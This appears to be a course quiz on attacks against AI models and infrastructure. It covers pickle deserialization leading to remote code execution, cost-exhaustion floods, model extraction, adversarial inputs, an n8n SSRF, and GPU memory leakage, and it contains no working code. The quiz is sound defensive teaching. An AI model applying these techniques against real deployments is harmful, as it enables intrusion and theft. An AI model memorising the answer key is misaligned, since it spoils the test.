Section 4 Quiz

Test Your Knowledge: Model and Infrastructure Attacks

Let’s see how much you’ve learned!

This quiz tests your understanding of serialization exploits, adversarial inputs, model theft, denial of service through unbounded consumption, infrastructure attack vectors, and the n8n CVE as a real-world example.

--- shuffle_answers: true shuffle_questions: false --- ## A healthcare startup downloads an open-source model from a hub and loads it using `torch.load()`. Three weeks later, their security team detects a reverse shell connecting to an external server. What vulnerability was exploited? > Hint: Think about what happens at the code level when Python deserializes a pickle file. - [ ] The model had a backdoor that activated on specific medical queries > A model backdoor would affect inference outputs, not establish network connections. The reverse shell indicates code execution, not model behavior. - [x] A pickle serialization exploit -- the model file contained embedded Python code that executed arbitrary commands when deserialized by torch.load() > Correct! This maps to LLM03: Supply Chain. Python's pickle module executes arbitrary code during deserialization by design. Loading a pickled model file with `torch.load()` is equivalent to running untrusted code. The safetensors format was developed to solve this problem by storing tensor data in a format that cannot execute code during loading. - [ ] The model's API endpoint was exposed without authentication > API exposure is a separate infrastructure risk. The attack here happened during model loading, before any API was set up. - [ ] An adversarial input triggered the model to generate a reverse shell command > LLMs generate text, not system commands. The reverse shell was established by executable code embedded in the model file itself during deserialization. ## An attacker sends repeated maximum-length (200,000 token) inputs to an organization's GPT-4 API endpoint. The attack racks up $50,000 in charges overnight. Which OWASP category does this map to? > Hint: Consider the resource asymmetry -- it's cheap to send a request but expensive to process one. - [ ] LLM01: Prompt Injection -- the attacker manipulated the model's behavior > Prompt injection targets model behavior and outputs. This attack targets computational resources and costs without caring about what the model generates. - [ ] LLM03: Supply Chain -- the API endpoint was compromised > Supply chain attacks target components in the development pipeline. This is a direct resource exhaustion attack against the production API. - [x] LLM10: Unbounded Consumption -- the attacker exploited the cost asymmetry of LLM inference by sending massive inputs that maximize compute costs > Correct! This is context window stuffing, a technique under LLM10: Unbounded Consumption. Processing a 200,000-token input costs dramatically more than processing a 100-token input. Without per-user rate limits, billing caps, and input length restrictions, a single attacker can exhaust GPU resources or run up devastating API charges. This is the same category that the Microsoft LLMjacking case mapped to. - [ ] LLM04: Data and Model Poisoning -- the training data was corrupted > Data poisoning targets the training pipeline. This attack targets the inference API's resource consumption. ## What is the key advantage of the safetensors model format over pickle-based formats like PyTorch .pt files? > Hint: Think about what fundamentally makes pickle dangerous and how safetensors avoids that risk. - [ ] Safetensors files are smaller and load faster than pickle files > While safetensors can be efficient, the primary advantage is security, not file size or loading speed. - [ ] Safetensors encrypts model weights to prevent theft > Safetensors does not encrypt weights. It stores them in a flat format that is readable but safe to load. - [x] Safetensors stores tensor data in a simple, flat format that cannot execute code during loading, eliminating the arbitrary code execution risk inherent in pickle deserialization > Correct! The safetensors format was developed specifically to solve the pickle serialization RCE problem (LLM03: Supply Chain). Pickle can execute arbitrary code by design -- safetensors stores only tensor data with no code execution capability. Major hubs like Hugging Face now default to safetensors and flag models using pickle serialization. - [ ] Safetensors is the only format supported by modern model hubs > Many hubs still support pickle-based formats for legacy compatibility. Safetensors is preferred for security but not universally required. ## The n8n workflow automation platform disclosed CVE-2025-68613, a Server-Side Request Forgery (SSRF) vulnerability. Why is this particularly concerning for organizations using n8n as an AI agent orchestration layer? > Hint: Think about what n8n connects to in a typical AI deployment and what SSRF enables. - [ ] It allows attackers to modify n8n workflow templates on public registries > Template modification on public registries is a supply chain issue. SSRF specifically enables unauthorized network requests from the server. - [x] n8n orchestrates AI agents' connections to databases, APIs, and internal tools -- an SSRF vulnerability lets attackers leverage those trusted connections to pivot into the internal network > Correct! This is a teaching moment about infrastructure security. n8n is commonly used as the orchestration layer for AI agents, connecting LLMs to internal services via trusted network paths. An SSRF vulnerability means an attacker can make the n8n server send requests to internal services, cloud metadata endpoints (like 169.254.169.254), and other resources behind the firewall -- using the same trusted connections that AI workflows rely on. The security of your AI system includes every component in the stack. - [ ] It allows attackers to inject prompts into any LLM that n8n connects to > SSRF enables arbitrary HTTP requests, not prompt injection. While the requests could reach LLM APIs, the core risk is broader network pivoting. - [ ] It only affects n8n cloud deployments, not self-hosted instances > SSRF can affect both self-hosted and cloud deployments. Self-hosted instances may be at even greater risk because they often run within internal networks with access to sensitive services. ## An attacker queries a proprietary model's API with thousands of strategically chosen inputs, records the outputs, and trains a local model to replicate the original's behavior. What is this technique called and why does it matter? > Hint: Think about what the attacker gains beyond just a copy of the model. - [ ] Data poisoning -- the attacker corrupts the original model through repeated queries > Sending queries doesn't corrupt the original model. The attacker is extracting information from the model, not modifying it. - [x] Model extraction (model theft) -- the attacker creates a local copy that approximates the proprietary model's capabilities without paying training costs, and can study it offline for transferable vulnerabilities > Correct! Model extraction maps to the model theft aspect of LLM03: Supply Chain. The distilled copy lets the attacker bypass API rate limits and costs, study the model offline to find vulnerabilities that transfer back to the original, and potentially violate data privacy if the copy retains training data characteristics. Organizations spend millions training proprietary models -- extraction steals that investment through the API. - [ ] Adversarial input generation -- the attacker is crafting inputs to cause errors > While the inputs are strategic, the goal is replication, not causing errors. The attacker is building a copy, not attacking the model's outputs. - [ ] Prompt injection -- the attacker manipulates the model through crafted inputs > Prompt injection aims to override model behavior in real time. Model extraction aims to copy model behavior permanently through systematic querying. ## Which of the following correctly describes an adversarial input attack against an LLM? > Hint: Think about what makes the perturbation "adversarial" versus just being a bad input. - [x] Carefully crafted perturbations that are imperceptible to humans but push the input across the model's decision boundary, causing incorrect outputs > Correct! Adversarial inputs exploit how ML models learn decision boundaries in high-dimensional spaces (related to LLM05: Improper Output Handling). For LLMs, this includes token-level perturbations (synonyms that change behavior), typographical attacks (strategic misspellings bypassing filters), and multimodal attacks (invisible signals in images that influence text generation). They're most dangerous when combined with other attacks, like crafting prompt injection payloads that bypass input filters. - [ ] Sending random garbage text to the model to crash the inference server > Random garbage is not adversarial -- it's just noise. Adversarial inputs are precisely crafted to cause specific incorrect behaviors while appearing normal. - [ ] Using extremely long prompts to exceed the model's context window > Exceeding context windows is a resource exhaustion attack (LLM10), not an adversarial input attack. Adversarial inputs are about precision, not volume. - [ ] Encrypting malicious prompts so the model decrypts and follows them > Encoding attacks are a form of prompt injection, not adversarial inputs. Adversarial inputs involve imperceptible perturbations, not encoding schemes. ## A security team assessing their self-hosted AI deployment identifies three confirmed vulnerabilities: (1) their model files use pickle serialization loaded via torch.load(), (2) their LLM API lacks per-user rate limiting, and (3) they suspect competitors are querying their API to extract model behavior. With resources to address only one vulnerability immediately, which should the team prioritize first? > Hint: Consider which vulnerability has the most severe potential impact -- think about what each exploit actually enables the attacker to do. - [ ] Rate limiting gaps -- because unbounded consumption can rack up massive costs and denial of service affects all users immediately > While unbounded consumption (LLM10) causes financial damage and service disruption, it does not compromise the integrity or confidentiality of the system. DoS is recoverable by adding rate limits after the fact. Serialization exploits enable full system compromise including data exfiltration, which is a more severe and harder-to-reverse outcome. - [ ] Model extraction -- because losing proprietary model IP represents the greatest long-term business risk > Model extraction (model theft) is a serious IP concern, but it is a confidentiality risk that does not give the attacker control over the organization's infrastructure. Serialization exploits enable remote code execution, which can lead to data exfiltration, lateral movement, and full system compromise -- a strictly more severe outcome than model copying. - [x] Pickle serialization exploits -- because loading untrusted model files enables remote code execution, giving attackers full control of the inference server, access to patient data, and the ability to pivot to other systems > Correct! Serialization exploits are prioritized over rate limiting and model extraction because they enable the most severe outcome: remote code execution (RCE). A pickle deserialization exploit gives the attacker arbitrary code execution with server permissions -- enabling reverse shells, credential theft, data exfiltration, and lateral movement. Rate limiting gaps cause financial damage (recoverable) and service disruption (temporary). Model extraction compromises IP (serious but contained). RCE compromises the entire infrastructure. The mitigation is also clear: migrate to safetensors format, which eliminates the code execution risk entirely. - [ ] All three should be addressed simultaneously -- prioritization is unnecessary for confirmed vulnerabilities > When resources are limited, prioritization is essential. These vulnerabilities have different severity profiles: serialization exploits enable RCE (full system compromise), rate limiting gaps enable financial damage (recoverable), and model extraction enables IP theft (contained). Addressing the highest-severity vulnerability first maximizes risk reduction per unit of effort. ## A GPU cluster serving multiple tenants runs an AI inference workload. Security researchers discover that GPU memory from one tenant's inference run is accessible to a subsequent tenant's request. What type of vulnerability is this? > Hint: Think about what data resides in GPU memory during inference and what happens when that memory isn't cleared. - [ ] Model theft -- the second tenant can extract model weights from GPU memory > While model weights are in GPU memory, the primary concern is about inter-tenant data leakage, not model theft specifically. - [ ] Prompt injection -- the previous tenant's prompts influence the next tenant's outputs > Prompt injection targets model behavior through crafted inputs. GPU memory leakage is a hardware/infrastructure issue, not a prompt-level attack. - [x] Cross-tenant data leakage -- prompts, context, and generated outputs from one tenant's inference remain in GPU memory and can be read by subsequent requests from another tenant > Correct! This is an infrastructure attack vector involving GPU memory vulnerabilities. During inference, GPUs hold sensitive data including prompts, context, model weights, and generated outputs. If GPU memory isn't cleared between requests or between tenants, this data can leak across isolation boundaries. This is particularly dangerous in shared GPU environments (cloud inference services) and relates to both infrastructure security and LLM02: Sensitive Information Disclosure. - [ ] Unbounded consumption -- the first tenant used too many GPU resources > Unbounded consumption is about resource exhaustion. GPU memory leakage is about data isolation failure, regardless of resource usage levels.